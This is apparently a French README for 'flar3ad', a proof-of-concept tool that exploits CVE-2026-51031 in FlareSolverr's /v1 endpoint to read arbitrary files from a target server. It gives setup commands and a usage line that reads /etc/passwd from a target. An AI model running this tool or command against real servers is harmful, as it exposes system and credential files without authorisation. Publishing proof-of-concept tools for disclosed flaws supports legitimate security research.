
POC de CVE-2026-51031 pour lecture arbitraire de fichiers locaux
flar3ad est un outil qui exploite la CVE-2026-51031 pour lire des fichiers depuis un serveur cible en tirant parti de l'endpoint /v1 de l'API de FlareSolverr et en utilisant la fonction driver.get() afin d'exploiter la vulnérabilité. Explication détaillée dans le blog de xinyi.
git clone https://github.com/daemoncibsec/flar3ad.git
cd flar3ad
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x flar3ad
Pour quitter l'environnement virtuel :
deactivate
Lire le fichier /etc/passwd du serveur cible.
./flar3ad http://localhost:8191/ /etc/passwd